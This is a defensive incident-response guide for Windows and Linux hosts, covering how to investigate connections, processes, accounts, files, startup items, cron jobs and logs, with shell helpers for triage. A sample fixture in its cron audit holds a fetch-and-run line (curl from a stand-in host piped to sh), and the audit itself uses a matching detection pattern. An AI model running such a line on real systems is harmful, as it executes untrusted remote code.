Mastering Incident Response: A Step‑by‑Step Guide for Security Professionals

This comprehensive guide walks security engineers through every phase of an incident response—from initial information gathering, containment, and vulnerability scanning to detailed log, process, and account analysis, culminating in recovery steps and post‑incident hardening recommendations.


Note: Do not be misled by customers or on‑site operations staff. Obtain client permission before any operation and adjust actions based on the actual emergency situation.

1. Understand the Situation

Occurrence time: Ask the client for the exact time the anomaly was noticed; tracking and analysis start from that point.

Affected system type: Ask for OS type and related details to guide emergency handling.

Windows/Linux

Business role (financial system, OA system, website), its importance, and whether it can be shut down

Weak passwords? Remote management ports open?

Which ports are open, what services, any risky services?

If necessary, conduct on‑site inspection; don’t trust verbal reports completely.

Abnormal conditions:

Files encrypted

Device fails to boot

Ransom note displayed

CPU usage excessively high

Web page defacement / malicious links

Abnormal outbound requests

Spam SMS sent externally

Other non‑normal situations

Existing mitigation measures:

Has this issue occurred before?

Were new policies configured after the incident?

Has a third party already performed emergency handling? What were the results?

Any other mitigation steps?

System architecture / network topology: Can a network diagram be provided?

Log collection:

Server logs

Application logs, especially web logs

Database logs

Existing security devices:

Endpoint AV

Firewall

WAF

Traffic analysis appliances

Basic emergency response plans:

Temporary mitigation plan

Ransomware response plan

Cryptomining malware response plan

Web defacement response plan

DDoS response plan

Internal data leakage response plan

Other response plans

Emergency report should include:

List of emergency methods

Port status, application analysis, mitigation suggestions

2. Contain Propagation Risk

Prohibit infected hosts from using USB drives; if necessary, back up data.

Disable all network adapters or unplug the cable.

Close related ports.

Segment and isolate network zones.

Isolate the host and back up relevant data.

Take infected services offline.

Pause certain functions on the infected host.

Reduce privileges of accounts on the infected host and change passwords.

Ransomware response: the core objective is loss mitigation, which is critical.

Identify infection scope via inspection devices and asset discovery.

Use network access control or disconnect the network to isolate infected zones.

Rapidly launch antivirus or backup‑restore actions to recover business.

Deploy monitoring devices to continuously watch for re‑infection.

Once production is restored and there is no further spread, collect samples and logs, perform technical analysis, locate the source, and create a remediation plan.

3. Scan Known High‑Risk Vulnerabilities

This can run concurrently with the steps above; make sure the scanner's own traffic and log entries do not pollute the analysis.

4. Basic System Information

Windows

1) Check the current patch level: systeminfo

Linux

1) List the ARP table and note the gateway MAC:

arp -a

2) Search the filesystem for a file pattern (for example, webshell candidates):

find / -name "*.asp"

Key checks

1) Are there unauthorized accounts?
2) Are there abnormal service programs?
3) Have any files been tampered with or newly created?
4) Are there abnormal login events in the security logs?
5) Are there unauthorized accesses to admin pages in the web logs?
6) Do processes and connections show signs of trojan activity?
7) If core commands (e.g., netstat) have been replaced, obtain clean copies from an uninfected host.
8) If a suspicious executable trojan is found, back it up before deletion.
9) If a suspicious script trojan is found, analyze its content for callback IPs, encryption, keywords, etc.

5. Abnormal Connection Investigation

Windows

1) View current network connections and locate suspicious ESTABLISHED entries:

netstat -ano
netstat -ano | findstr ESTABLISH
# -a: show all connections, -n: numeric addresses, -o: show owning PID, -r: routing table, -s: protocol stats
# states include LISTENING, ESTABLISHED, CLOSE_WAIT, etc.

2) Find the PID that owns a port:

netstat -ano | findstr "<port>"

3) Show the executable behind each connection (requires admin):

netstat -nb

Linux

1) List processes with open TCP/UDP sockets:

lsof -i
lsof -i | grep -E "LISTEN|ESTABLISHED"

2) List open ports and connection states:

netstat -antlp
netstat -an
# -a show all sockets, -n numeric, -t TCP, -u UDP, -v verbose, -p show owning program, -s stats

6. Running Abnormal Process Investigation

Windows

1) View abnormal processes in Task Manager.
2) List all processes (local or remote) and filter by PID:

tasklist | findstr 11223

3) Get the full path of a process:

wmic process | findstr "xx.exe"

4) View detailed process info (path, PID, creation date, start time).
5) Terminate a process:

wmic process where processid="2345" delete

Linux

1) Find the PID of a suspicious process:

netstat -antlp    # find the port, then
lsof -i:<port>    # locate the PID

2) Locate the files of a PID:

cd /proc/<pid>
ls -ail   # the exe link points to the executable

3) Check memory and CPU usage: top
4) Show current process info: ps
5) Search precisely for a process: ps -ef | grep apache
6) Kill a process: kill -9 <pid>
7) View the process tree: pstree -p
8) Search the filesystem for a suspicious program's file by name:

find / -name 'xxx'
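As an added example (not part of the original guide), a small shell helper that applies the checks from sections 5 and 6 to `netstat -antlp` output: it lists every LISTEN socket and every ESTABLISHED connection whose peer lies outside loopback and RFC 1918 space, with the owning PID/program so the PID can be followed into /proc/<pid>. It assumes the net-tools column layout shown in the constructed sample.

```shell
#!/bin/sh
# Triage `netstat -antlp` output (net-tools column layout assumed):
# print every LISTEN socket and every ESTABLISHED connection whose peer
# is outside loopback / RFC 1918 space, with the owning PID/program.
# Usage: netstat -antlp 2>/dev/null | triage_sockets
triage_sockets() {
    awk '
        $1 != "tcp" && $1 != "tcp6" { next }      # skip headers and udp
        {
            peer = $5; sub(/:[0-9*]+$/, "", peer)  # drop the port
            prog = $7                              # "PID/Program name" may contain spaces
            for (i = 8; i <= NF; i++) prog = prog " " $i
        }
        $6 == "LISTEN" { printf "LISTEN      %-22s %s\n", $4, prog }
        $6 == "ESTABLISHED" &&
        peer !~ /^(127\.|10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|::1$)/ {
            printf "EXTERNAL    %-22s -> %-22s %s\n", $4, $5, prog
        }'
}

# Constructed sample output (not from a real host) so the block runs stand-alone.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      3120/.x
tcp        0      0 10.0.0.5:22             10.0.0.20:51234         ESTABLISHED 2991/sshd: alice
tcp        0      0 10.0.0.5:45012          203.0.113.7:443         ESTABLISHED 3120/.x
tcp        0      0 127.0.0.1:3306          127.0.0.1:40000         ESTABLISHED 1450/mysqld'

printf '%s\n' "$SAMPLE_NETSTAT" | triage_sockets
```

Run against a live host with `netstat -antlp | triage_sockets`; a LISTEN line with an unfamiliar program name or an EXTERNAL line to an unknown address is the PID to take into /proc/<pid>.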

7. Abnormal Account Investigation

Windows

1) View accounts and groups via the GUI: lusrmgr.msc
2) List accounts: net user
3) Show details of a specific account: net user Guest
4) List the administrators group: net localgroup administrators
5) View current sessions (e.g., remote terminal logins):

query user
logoff <ID>   # kick out a user by session ID or username

Linux

1) View currently logged-in users and their addresses: w
2) Show recent login records: last | more
3) View /etc/passwd for account information:

cat /etc/passwd
# fields: username:password:UID:GID:comment:home:shell
# a nologin shell indicates a non-login account.

4) View /etc/shadow for password hashes and expiry: cat /etc/shadow
5) Home directories of non-root users: /home
6) Last login times: lastlog
7) Failed login attempts (brute force): lastb
8) Currently logged-in users: who
9) Current user activity: w
10) System uptime and load: uptime
11) Disable an account (prefixes the hash in /etc/shadow with !): usermod -L user
12) Delete a user: userdel -r user
13) Create a user:

useradd admin          # no home directory
passwd admin           # set password
adduser admin2         # creates a home directory

14) Force delete a user and their home directory:

userdel admin2
userdel -rf admin
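As an added example (not part of the original guide), a shell helper that turns the /etc/passwd review in step 3 into four concrete checks: a second UID-0 account, an empty password field, a system account that has been given an interactive shell, and two names sharing one UID. The input is a constructed passwd file, not a real host.

```shell
#!/bin/sh
# Audit /etc/passwd-format input for traces of an unauthorised account:
#   UID0     a second UID-0 account besides root
#   NOPASS   empty password field (no password required)
#   SYSSHELL a system account (UID 1-999) given an interactive shell
#   DUPUID   two names sharing one UID
# Usage: audit_passwd /etc/passwd      (or: cat /etc/passwd | audit_passwd)
audit_passwd() {
    awk -F: '
        NF < 7 { next }                                  # skip malformed lines
        $1 != "root" && $3 == 0 { print "UID0     " $1 }
        $2 == ""                { print "NOPASS   " $1 }
        ($3 + 0) > 0 && ($3 + 0) < 1000 &&
        $7 !~ /(nologin|false|sync|shutdown|halt)$/ { print "SYSSHELL " $1 " " $7 }
        { count[$3]++; names[$3] = names[$3] " " $1 }
        END { for (u in count) if (count[u] > 1) print "DUPUID   " u names[u] }
    ' "${1:--}"
}

# Constructed sample (not a real host) so the block runs stand-alone.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
sysadm:x:0:0::/tmp:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1000:1002::/home/bob:/bin/bash'

printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
```

Every finding is a lead, not a verdict: compare each flagged name against the client's known accounts and against lastlog before deciding it is hostile.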

8. Abnormal File Analysis

Windows

1) View file timestamps via file properties.
2) Examine %UserProfile%\Recent for shortcuts to recently used documents.
3) Use file timestamps to locate suspicious files; a modified time earlier than the creation time is a red flag.

Linux

1) Analyze file dates: stat xx.asp
2) Find files modified in the last 24 hours:

find ./ -mtime 0
# 0-24 h: -mtime 0
# 24-48 h: -mtime 1
# last 10 days: -mtime -10 (equivalent to -mtime 0 -o -mtime 1 -o ... -o -mtime 9)

3) Scan sensitive directories (e.g., /tmp, /usr/bin, /usr/sbin) for recently changed files:

ls -alt /tmp/ | head -n 10

4) Find files with 777 permissions:

find / -name "*.jsp" -perm 777
find / -perm 777 | more
find / -name "*.sh" -perm 777

5) Find hidden files (names starting with .): ls -ar | grep "^\."
6) Set the immutable attribute (the file cannot be modified, deleted or renamed, even by root):

chattr +i filename   # set
chattr -i filename   # clear
lsattr filename      # view attributes

7) Set the append-only attribute (useful for protecting logs):

chattr +a filename
chattr -a filename
lsattr filename

8) Check ~/.ssh directories (especially authorized_keys) for unknown public keys; an unauthenticated Redis instance (port 6379) is a common way such keys get written.

9. Startup Item Investigation

Windows

1) Check startup items via msconfig.
2) Windows 10 startup folder:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

3) Windows 7 startup folder:

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

4) Registry startup keys to inspect:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Linux

1) List init scripts: ls -alt /etc/init.d/
2) View rc.local: more /etc/rc.local
3) Examine the runlevel directories (/etc/rc.d/rc[0-6].d).
4) Manage cron jobs (basic usage):

# List user crontab
crontab -l
# Delete all user crontab
crontab -r
# Edit crontab
crontab -e
# Example: */1 * * * * echo "hello world" >> /tmp/test.txt

5) Anacron for jobs that must still run when the host was off at the scheduled time:

# /etc/anacrontab entry: period(days) delay(minutes) job-identifier command
1 10 example.daily /bin/bash /home/backup.sh

10. Scheduled Task Investigation (Cron / Task Scheduler)

Windows Open Task Scheduler (taskschd.msc) or via System Tools → Task Scheduler.

Linux

List the current user's cron jobs: crontab -l
Inspect a specific user's crontab: crontab -u <user> -l
Check the system cron directories and files:

ls -al /etc/cron*
cat /etc/crontab

Key directories to review for malicious scripts:

/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab
/var/spool/anacron/*
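As an added example (not part of the original guide), a shell function that walks the cron locations listed above and flags entries with traits common to cryptomining and backdoor persistence: a download piped into a shell, base64 decoding, and programs staged under /tmp or /dev/shm. The root-prefix argument is an assumption that lets a mounted disk image be audited; the sample tree it runs against is constructed and clearly fake.

```shell
#!/bin/sh
# Walk the cron locations listed above and flag entries with traits common to
# cryptomining and backdoor persistence: download-and-run pipelines, base64
# decoding, and programs staged under /tmp or /dev/shm. Comment lines are
# ignored. An optional root prefix lets a mounted disk image be audited.
# Usage: cron_audit [root_prefix]
cron_audit() {
    root="${1:-}"
    for f in "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/* \
             "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/etc/anacrontab \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/*; do
        [ -f "$f" ] || continue                 # unmatched globs stay literal
        grep -nE '((curl|wget)[^|]*\| *(ba)?sh|base64 +(-d|--decode)|/(tmp|dev/shm)/)' "$f" |
            grep -vE '^[0-9]+:[[:space:]]*#' |
            sed "s|^|${f#$root}:|"              # print as path:line:entry
    done
    return 0
}

# Build a constructed, clearly fake cron tree (not a real host) for a dry run.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/etc/cron.d" "$t/etc/cron.daily" "$t/var/spool/cron"
    printf '%s\n' '# nightly backup' '0 2 * * * root /usr/local/bin/backup.sh' > "$t/etc/crontab"
    printf '%s\n' '*/5 * * * * curl -s http://example.invalid/x.sh | sh' > "$t/var/spool/cron/root"
    printf '%s\n' '#!/bin/sh' '/dev/shm/.x/kthreadd' > "$t/etc/cron.daily/logrotate2"
    printf '%s\n' '# "wget | sh" inside a comment is ignored' > "$t/etc/cron.d/clean"
    echo "$t"
}

T=$(make_sample_tree)
cron_audit "$T"
rm -rf "$T"
```

On a live host run `cron_audit` with no argument; the patterns are deliberately broad, so treat each hit as something to read, not something to delete.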

11. Log Investigation

Windows

1) Review security appliance logs.
2) Open Event Viewer: eventvwr.msc
3) Filter for brute-force events (e.g., Event ID 4625, a failed logon, on Server 2008).

Linux

1) Review command history: more /root/.bash_history
2) Check /var/log/secure for authentication attempts.
3) Use lastb and last for brute-force tracing.
4) Check the system logs (locations set in rsyslog.conf) for wget/ssh/scp/tar/zip activity, account changes, etc. Common log files:

/var/log/messages  # general system messages and errors
/var/log/secure    # authentication and security-related
/var/log/maillog   # mail
/var/log/cron      # scheduled tasks
/var/log/spooler   # UUCP/news
/var/log/boot.log  # boot-time service start/stop
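As an added example (not part of the original guide), a shell helper for the brute-force tracing in steps 2 and 3: it reads standard OpenSSH syslog lines from /var/log/secure (or auth.log), counts failed logins per source IP, and, for every IP at or above a threshold, reports whether that same IP later obtained an accepted login, which is the fact that separates an intrusion from background noise. The log lines are constructed, not from a real host.

```shell
#!/bin/sh
# Summarise sshd brute-force activity from /var/log/secure (or auth.log) lines.
# For every source IP at or above the failure threshold, print the failure
# count, whether that IP later achieved an accepted login, and the user
# names it tried.
# Usage: brute_force_report [threshold] < /var/log/secure
brute_force_report() {
    awk -v thr="${1:-5}" '
        /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for / {
            # "... for [invalid user] NAME from IP port N ssh2"
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
            if ($0 ~ /Failed/) {
                fail[ip]++
                if (!((ip, user) in seen)) { seen[ip, user] = 1; tried[ip] = tried[ip] " " user }
            } else {
                ok[ip]++; okuser[ip] = user
            }
        }
        END {
            for (ip in fail) if (fail[ip] >= thr)
                printf "%-16s fails=%d accepted=%d %s tried:%s\n", ip, fail[ip], ok[ip] + 0,
                    (ok[ip] > 0) ? "COMPROMISED(" okuser[ip] ")" : "blocked-or-ongoing", tried[ip]
        }'
}

# Constructed log lines (not from a real host) so the block runs stand-alone.
SAMPLE_SECURE='Mar  3 10:01:02 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Mar  3 10:01:04 web1 sshd[2213]: Failed password for root from 203.0.113.7 port 51236 ssh2
Mar  3 10:01:06 web1 sshd[2215]: Failed password for root from 203.0.113.7 port 51238 ssh2
Mar  3 10:01:08 web1 sshd[2217]: Failed password for invalid user test from 203.0.113.7 port 51240 ssh2
Mar  3 10:01:10 web1 sshd[2219]: Failed password for root from 203.0.113.7 port 51242 ssh2
Mar  3 10:01:12 web1 sshd[2221]: Failed password for invalid user admin from 203.0.113.7 port 51244 ssh2
Mar  3 10:02:10 web1 sshd[2290]: Accepted password for root from 203.0.113.7 port 51300 ssh2
Mar  3 10:05:00 web1 sshd[2310]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Mar  3 10:05:03 web1 sshd[2312]: Failed password for alice from 198.51.100.9 port 40002 ssh2
Mar  3 10:06:00 web1 sshd[2320]: Accepted publickey for alice from 192.0.2.5 port 40010 ssh2'

printf '%s\n' "$SAMPLE_SECURE" | brute_force_report 5
```

A COMPROMISED line gives the account and the source address to pivot on in last, lastlog and the command history; an IP that never succeeded belongs in the emergency report as an attack source but is not by itself evidence of intrusion.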

Web server: monitor access_log and error_log (or access.log and error.log). The Apache log location is set by the CustomLog directive in httpd.conf. IIS logs default to %systemroot%\system32\LogFiles\W3SVC and are named exYYMMDD.log.

Database: MySQL example, searching the query log for an injection keyword:

grep union mysql.log

12. Recovery Phase

This phase is client‑driven; provide recommendations only.

13. Follow‑up Summary

Analyze incident cause:

Attack source IP.

Attack behavior (weak passwords, vulnerable commands, etc.).

Produce emergency report.

Post‑incident monitoring.

Offer hardening suggestions.

Appendix 1: Useful Security Tools

Common Windows security tools (illustrated).

Common Linux security tools; if Linux tools are inconvenient, copy files and scan with Windows tools.

Appendix 2: Additional Tips

Kill virus processes before handling removable media.

If log analysis is difficult, perform webshell scanning on code.

PC Hunter signature colors: black = Microsoft‑signed driver, blue = non‑Microsoft driver, red = suspicious object.

Process Explorer tips: view parent/child processes, properties (image path, command line, work dir, startup location, user, start time, TCP/IP, permissions), configure colors, etc.

chkrootkit functions: detect backdoors, rootkits, replaced system commands, and login-log tampering. Install via rpm -ivh chkrootkit-0.47-1.i386.rpm; run chkrootkit -n (the -n flag skips NFS-mounted directories).

rkhunter functions: binary checksum, rootkit detection, sensitive directories, service anomalies, third‑party app version checks.

RPM verification: rpm -Va > rpm.log; altered binaries like ps, pstree, netstat, sshd may indicate compromise.

Original source: https://github.com/1120362990/Paper/...#7%E5%BC%82%E5%B8%B8%E8%B4%A6%E5%8F%B7%E6%8E%92%E6%9F%A5

Written by

Open Source Linux

Focused on sharing Linux/Unix content, covering fundamentals, system development, network programming, automation/operations, cloud computing, and related professional knowledge.
